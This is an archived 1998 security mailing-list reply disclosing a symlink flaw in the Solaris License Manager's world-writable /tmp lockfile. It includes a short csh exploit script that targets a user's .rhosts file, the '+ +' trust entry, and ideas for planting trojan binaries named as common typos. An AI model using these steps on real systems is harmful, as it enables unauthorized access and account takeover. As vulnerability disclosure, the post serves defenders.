Re: License Manager's lockfiles (Solaris 2.5.1)

From: Roger Harrison ? (rharri01at_private)
Date: Fri Oct 23 1998 - 17:22:03 PDT

Next message: Steven M. Bellovin: "Re: buffer overflow vulnerability in netscape 3.0 to 4.5"

Previous message: Tobias J. Kreidl: "Re: solaris tape dev permission stupidity"
Maybe in reply to: Joel Eriksson: "License Manager's lockfiles (Solaris 2.5.1)"
Next in thread: Don Lewis: "Re: License Manager's lockfiles (Solaris 2.5.1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 21 Oct 1998, Joel Eriksson wrote:

> License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by
> root and mode 666 (worldwrite'able). That is not good, since anyone could
> create rootowned files which they then would be able to modify. It's an
> even bigger problem since it just takes about a minute 'til the lockfile
> is created after it's replaced with a symlink which it follows ..

I discovered this a few months ago and neglected to post it.
Solaris 2.6 is affected as well.  A lock file locksuntechd is created
in /tmp mode 666 owned by root and group root.  I think the program is
lmgrd FLEXlm v2.26d that is causing the problems, either that or suntechd.

%ls -la /tmp/locksuntechd
-rw-rw-rw-  1 root      root        0 Oct 22 12:51 locksuntechd

suntechd is in /opt/SUNWspro/SunTech_License/bin/

there is a log file that contains some stuff about when the daemon is
going up or down and also if users are exploiting it you can see entries
about the lock file not being available.  It is in
/opt/SUNWspro/SunTech_License/license.log

So to exploit it, just remove the locksuntechd file and replace it with a
symlink to a file you want to create.  It will not overwrite existing
files from the testing that i did.  Then the link is followed and the new
file is created with mode 666 ownership root.  You can then delete the
symlink and create a new one to somewhere else and it will work again and
again and again...what fun.  Users could create .rhosts files, new system
webpages, new trojan binaries with names spelled slightly off that get
misspelled often (finger-fineger, pine-pien, ls-sl)  come on.. tell me
you never typed one of those out wrong while you were typing fast!

------
#!/bin/csh -f
# Change target user name before running
# Iconoclastat_private 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
then wait a min and cat + + >> ~targetuser/.rhosts

that's all for now...

-Iconoclast
iconoclastat_private

shout-outs to segv and timespace

Next message: Steven M. Bellovin: "Re: buffer overflow vulnerability in netscape 3.0 to 4.5"
Previous message: Tobias J. Kreidl: "Re: solaris tape dev permission stupidity"
Maybe in reply to: Joel Eriksson: "License Manager's lockfiles (Solaris 2.5.1)"
Next in thread: Don Lewis: "Re: License Manager's lockfiles (Solaris 2.5.1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:57 PDT